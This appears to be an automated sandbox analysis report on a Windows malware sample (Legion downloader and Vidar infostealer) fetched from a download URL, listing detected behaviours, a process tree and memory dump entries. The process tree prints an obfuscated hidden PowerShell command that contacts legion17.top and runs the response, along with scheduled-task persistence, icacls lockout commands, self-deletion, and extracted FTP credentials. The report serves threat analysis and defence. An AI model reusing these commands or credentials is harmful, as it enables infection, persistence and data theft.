Analysis

  • max time kernel
    149s
  • max time network
    150s
  • resource
    win10v191014
  • submitted
    16-12-2019 13:26

General

  • Target

    http://mynevainstall.org/eupanda.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://legion17.top/legion17/welcome

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    45.81.235.3
  • Port:
    21
  • Username:
    unser_server.118273
  • Password:
    PHST6112002002

Signatures

  • Legion

    Legion is a malware downloader written in C++.

  • Legion downloader 2 IoCs

    Detected Legion downloader HTTP request code and PowerShell execution.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 5 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • JavaScript code in executable 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Program crash 3 IoCs
  • Checks processor information in registry 2 TTPs 11 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 33 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • NTFS ADS 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 523 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 118 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://mynevainstall.org/eupanda.exe
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4932
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4932 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:4980
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\eupanda.exe
      "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\eupanda.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3940
      • C:\Users\Admin\AppData\Local\Temp\is-DS0V7.tmp\eupanda.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-DS0V7.tmp\eupanda.tmp" /SL5="$40146,8491859,56832,C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\eupanda.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4436
        • C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\postback.EXE
          "C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\postback.EXE" waggle waggle
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4644
          • C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\slhost2.exe
            "C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\slhost2.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3712
            • C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\slhost2.exe
              "C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\slhost2.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Checks processor information in registry
              • NTFS ADS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1672
              • C:\ProgramData\E9BZLP6Q0N.exe
                "C:\ProgramData\E9BZLP6Q0N.exe"
                7⤵
                • Executes dropped EXE
                PID:1968
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 584
                  8⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2144
              • C:\ProgramData\FX073BL9N1.exe
                "C:\ProgramData\FX073BL9N1.exe"
                7⤵
                • Executes dropped EXE
                • NTFS ADS
                • Suspicious use of WriteProcessMemory
                PID:2436
                • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\dll.exe
                  C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\dll.exe
                  8⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • NTFS ADS
                  • Suspicious use of WriteProcessMemory
                  PID:1804
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {VLUVX5IB-VH3O-V55H-LS2K-LOBMHNF2I1F7} /tr C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\5YXS.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
                    9⤵
                      PID:1972
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /tn {VLUVX5IB-VH3O-V55H-LS2K-LOBMHNF2I1F7} /tr C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\5YXS.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
                        10⤵
                        • Creates scheduled task(s)
                        PID:4972
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
                      9⤵
                        PID:2188
                        • C:\Windows\SysWOW64\icacls.exe
                          icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
                          10⤵
                          • Modifies file permissions
                          PID:5044
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
                        9⤵
                          PID:2400
                          • C:\Windows\SysWOW64\icacls.exe
                            icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
                            10⤵
                            • Modifies file permissions
                            PID:5016
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
                          9⤵
                            PID:4292
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
                              10⤵
                              • Modifies file permissions
                              PID:2608
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
                            9⤵
                              PID:992
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
                                10⤵
                                • Modifies file permissions
                                PID:2488
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                              9⤵
                                PID:1476
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                                  10⤵
                                  • Modifies file permissions
                                  PID:4964
                              • C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\5YXS.exe
                                "C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\5YXS.exe"
                                9⤵
                                • Executes dropped EXE
                                PID:5116
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 944
                                  10⤵
                                  • Program crash
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4880
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /im slhost2.exe /f & erase C:\Users\Admin\AppData\Local\Temp\is-L2B98.tmp\slhost2.exe & exit
                            7⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2448
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im slhost2.exe /f
                              8⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5044
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex#@(n#ew###-#ob#jec#t N#######################################################################et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//legion17.top/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4736
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -windowstyle hidden -command "&{$t='#i#ex#@(n#ew###-#ob#jec#t N#######################################################################et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//legion17.top/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                          6⤵
                            PID:3680
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 692
                              7⤵
                              • Program crash
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3736
                • C:\Windows\system32\SppExtComObj.exe
                  C:\Windows\system32\SppExtComObj.exe -Embedding
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2044
                  • C:\Windows\System32\SLUI.exe
                    "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
                    2⤵
                      PID:1848
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
                    1⤵
                    • Modifies data under HKEY_USERS
                    • Suspicious use of WriteProcessMemory
                    PID:3964
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k WerSvcGroup
                    1⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:4240
                  • \??\c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
                    1⤵
                      PID:4088
                    • \??\c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                      1⤵
                        PID:3524
                      • \??\c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s wisvc
                        1⤵
                          PID:3032
                        • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\ir50_qcxoriginal.exe
                          C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\ir50_qcxoriginal.exe
                          1⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4576
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:3400
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:4528
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:816
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:912
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:1880
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:4352
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:5012
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:5016
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:320
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:4252
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:3364
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:2496
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:4612
                          • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\wship6.exe
                            2⤵
                            • Executes dropped EXE
                            PID:2684
                        • \??\c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                          1⤵
                          • Modifies service
                          • Drops file in Windows directory
                          • Modifies data under HKEY_USERS
                          PID:1332
                        • \??\c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                          1⤵
                          • Modifies service
                          PID:1652
                        • \??\c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
                          1⤵
                            PID:2552
                          • \??\c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k unistacksvcgroup
                            1⤵
                              PID:4828
                            • \??\c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
                              1⤵
                              • Modifies service
                              PID:1188
                            • C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\ir50_qcxoriginal.exe
                              C:\ProgramData\amd64_system.data.oracleclient_b77a5c561934e089_10.0.18362.1_none_6a209a245d7745f8\ir50_qcxoriginal.exe
                              1⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              PID:4652

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • memory/1804-234-0x0000000003467000-0x0000000003468000-memory.dmp

                              Filesize

                              4KB

                            • memory/1804-235-0x0000000003900000-0x0000000003901000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-205-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-186-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-199-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-200-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-201-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-202-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-203-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-204-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-159-0x0000000004C50000-0x0000000004C51000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-206-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-207-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-208-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-209-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-210-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-211-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-212-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-213-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-197-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-196-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-195-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-194-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-193-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-192-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-191-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-190-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-189-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-188-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-160-0x0000000004C50000-0x0000000004C51000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-187-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-198-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-185-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-183-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-162-0x00000000055B0000-0x00000000055B1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-169-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-184-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-182-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-181-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-180-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-179-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-178-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-177-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-176-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-175-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-174-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-173-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-170-0x00000000056A0000-0x00000000056A1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-172-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/2144-171-0x0000000003200000-0x0000000003201000-memory.dmp

                              Filesize

                              4KB

                            • memory/3736-39-0x00000000053D0000-0x00000000053D1000-memory.dmp

                              Filesize

                              4KB

                            • memory/3736-16-0x00000000049A0000-0x00000000049A1000-memory.dmp

                              Filesize

                              4KB

                            • memory/3736-17-0x00000000052E0000-0x00000000052E1000-memory.dmp

                              Filesize

                              4KB

                            • memory/4880-1392-0x0000000005290000-0x0000000005291000-memory.dmp

                              Filesize

                              4KB

                            • memory/4880-424-0x00000000051A0000-0x00000000051A1000-memory.dmp

                              Filesize

                              4KB

                            • memory/4880-421-0x00000000049E0000-0x00000000049E1000-memory.dmp

                              Filesize

                              4KB

                            • memory/4880-420-0x00000000049E0000-0x00000000049E1000-memory.dmp

                              Filesize

                              4KB

                            • memory/4980-0-0x0000000006310000-0x0000000006311000-memory.dmp

                              Filesize

                              4KB

                            • memory/5116-396-0x0000000003900000-0x0000000003901000-memory.dmp

                              Filesize

                              4KB

                            • memory/5116-395-0x0000000003717000-0x0000000003718000-memory.dmp

                              Filesize

                              4KB